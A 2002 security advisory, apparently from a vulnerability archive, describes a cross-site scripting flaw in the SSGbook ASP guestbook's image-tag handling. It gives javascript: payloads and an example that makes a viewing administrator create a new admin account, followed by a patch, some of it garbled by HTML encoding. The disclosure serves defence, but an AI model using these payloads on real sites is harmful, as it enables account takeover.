SSGbook (ASP)

2002-10-08T00:00:00
ID SECURITYVULNS:DOC:3601
Type securityvulns
Reporter Securityvulns
Modified 2002-10-08T00:00:00

Description

Informations : °°°°°°°°°°°°°° Product : SSGbook Langage : ASP Tested version : 1 Website : http://www.script-shed.com Problem : Cross Site Scripting

PHP Code / location : °°°°°°°°°°°°°°°°°°°°° ----------------- config.asp ---------------------- fString = doCode(fString, "[img]","[/img]","<img src=""",""" border=0>") fString = doCode(fString, "[image]","[/image]","<img src=""",""" border=0>") fString = doCode(fString, "[img=right]","[/img=right]","<img align=right src=""",""" id=right border=0>") fString = doCode(fString, "[image=right]","[/image=right]","<img align=right src=""",""" id=right border=0>") fString = doCode(fString, "[img=left]","[/img=left]","<img align=left src=""",""" id=left border=0>") fString = doCode(fString, "[image=left]","[/image=left]","<img align=left src=""",""" id=left border=0>") ----------------- config.asp ----------------------

Exploit : °°°°°°°°° [image]javascript:{SCRIPT}[/image] [img=right]javascript:{SCRIPT}[/img=right] [image=right]javascript:{SCRIPT}[/image=right] [img=left]javascript:{SCRIPT}[/img=left] [image=left]javascript:{SCRIPT}[/image=left] [img]javascript:{SCRIPT}[/img]

e.g. : [image]javascript:document.location="ss_admin.asp?Mode=Update&Acton=Access&UserName=Pom&Password=turlututu";[/image]

Add an admin if an admin read it. Login : Pom, Password : turlututu

Patch : °°°°°°° In config.asp : Add this line :

strOutput = Replace(strOutput, chr(34), "&quot;")

after


strOutput = Replace(strOutput, "<", "&lt;") strOutput = Replace(strOutput, ">", "&gt;")


And replace this lines :


    fString = doCode&#40;fString, &quot;[img]&quot;,&quot;[/img]&quot;,&quot;&lt;img src=&quot;&quot;&quot;,&quot;&quot;&quot; border=0&gt;&quot;&#41;
    fString = doCode&#40;fString, &quot;[image]&quot;,&quot;[/image]&quot;,&quot;&lt;img src=&quot;&quot;&quot;,&quot;&quot;&quot;

border=0>") fString = doCode(fString, "[img=right]","[/img=right]","<img align=right src=""",""" id=right border=0>") fString = doCode(fString, "[image=right]","[/image=right]","<img align=right src=""",""" id=right border=0>") fString = doCode(fString, "[img=left]","[/img=left]","<img align=left src=""",""" id=left border=0>") fString = doCode(fString, "[image=left]","[/image=left]","<img align=left src=""",""" id=left border=0>")


by :


    fString = doCode&#40;fString, &quot;[img]http://&quot;,&quot;[/img]&quot;,&quot;&lt;img src=&quot;&quot;http://&quot;,&quot;&quot;&quot;

border=0>") fString = doCode(fString, "[image]http://","[/image]","<img src=""http://",""" border=0>") fString = doCode(fString, "[img=right]http://","[/img=right]","<img align=right src=""http://",""" id=right border=0>") fString = doCode(fString, "[image=right]http://","[/image=right]","<img align=right src=""http://",""" id=right border=0>") fString = doCode(fString, "[img=left]http://","[/img=left]","<img align=left src=""http://",""" id=left border=0>") fString = doCode(fString, "[image=left]http://","[/image=left]","<img align=left src=""http://",""" id=left border=0>")


More details in french : http://www.frog-man.org/tutos/SSGbook.txt

translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FSSGbook.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools

frog-m@n


Discutez en ligne avec vos amis ! http://messenger.msn.fr